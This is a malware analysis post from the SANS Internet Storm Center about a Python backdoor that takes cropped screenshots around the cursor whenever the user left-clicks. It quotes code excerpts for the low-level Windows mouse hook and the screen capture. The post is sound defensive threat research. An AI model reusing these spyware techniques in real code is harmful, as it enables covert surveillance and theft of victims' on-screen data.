Today, everything is “smart” or “intelligent”. We have smartphones, smart cars, smart doorbells, etc. Being "smart" means performing actions depending on the context, the environment, or user actions.
For a while, backdoors and trojans have implemented screenshot capabilities. From an attacker’s point of view, it’s interesting to “see” what’s displayed on the victim’s computer. To take a screenshot in Python is easy as this:
import pyautogui screenshot = pyautogui.screenshot(‘screenshot.png')
You have two approaches to record screenshots:
- On-demand, when the C2 server issues a command like “TAKE_SCREENSHOT”
- At regular intervals (every x seconds)
In the first case, the attacker needs to interact with the malware and can miss interesting “screens”. In the second one, the technique will generate a lot of overloads (CPU, storage, bandwidth, …)
Yesterday, I spotted an interesting Python backdoor that implements many classic features (like keylogger, port-scanner, …) but also a “smart” screenshot feature. Why smart? Because a screenshot is taken… when the user clicks on the mouse!
Windows is an event-based operating system. A program can attach to a message bus and listen for specific events (ex: mouse, keyboard, …). When such an event is detected, a defined function is executed (in ASM, you instruct the CPU to jump to a specific location in memory).
How does it work? The attacker defines a “hook” (or a listener) for mouse events:
def install_hook(self): CMPFUNC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(c_void_p)) self.pointer = CMPFUNC(self.hook_proc) self.hooked = self.lUser32.SetWindowsHookExA(WH_MOUSE_LL, self.pointer, kernel32.GetModuleHandleW(None), 0) if not self.hooked: return False return True
The interesting API call is SetWindowsHookExA() combined with the WH_MOUSE_LL event type[1]. How to interpret this? From now, when the mouse is used, the program will execute self.pointer (self.hook_proc).
Here is the called function:
def hook_proc(self, nCode, wParam, lParam):
if wParam == 0x201:
buf, height, width = self.get_screenshot()
exe, win_title="unknown", "unknown"
try:
exe, win_title=get_current_process()
except Exception:
pass
self.screenshots.append((str(datetime.now()), height, width, exe, win_title, buf.encode('base64')))
return user32.CallNextHookEx(self.hooked, nCode, wParam, lParam)
The screenshot capture will be triggered when the wParam is 0x201. This value corresponds to a WM_LBUTTON_DOWN[2] event (when the user presses the left mouse button). Note the function calls CallNextHookEx() to continue to listen to events.
Even better, the attacker does not capture a full screenshot but only the interesting area (where the victim clicked)
def get_screenshot(self): pos = queryMousePosition() limit_width = GetSystemMetrics(SM_CXVIRTUALSCREEN) limit_height = GetSystemMetrics(SM_CYVIRTUALSCREEN) limit_left = GetSystemMetrics(SM_XVIRTUALSCREEN) limit_top = GetSystemMetrics(SM_YVIRTUALSCREEN) height = min(100,limit_height) width = min(200,limit_width) left = max(pos['x']-100,limit_left) top = max(pos['y']-50,limit_top) ...
I find this technique clever because the attacker increases the chances of seeing juivy information around the mouse. Example:
The file SHA256 is 34000abaac50ac84d493d2e55b6fb002fe06920b344f02ee55ff77e725793981[3] and has a low VT score (only 6/60).
[1] https://learn.microsoft.com/en-us/windows/win32/winmsg/about-hooks#wh_mouse_ll
[2] https://github.com/mwinapi/mwinapi/blob/master/ManagedWinapi/Hooks/LowLevelHook.cs
[3] https://bazaar.abuse.ch/sample/34000abaac50ac84d493d2e55b6fb002fe06920b344f02ee55ff77e725793981/
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.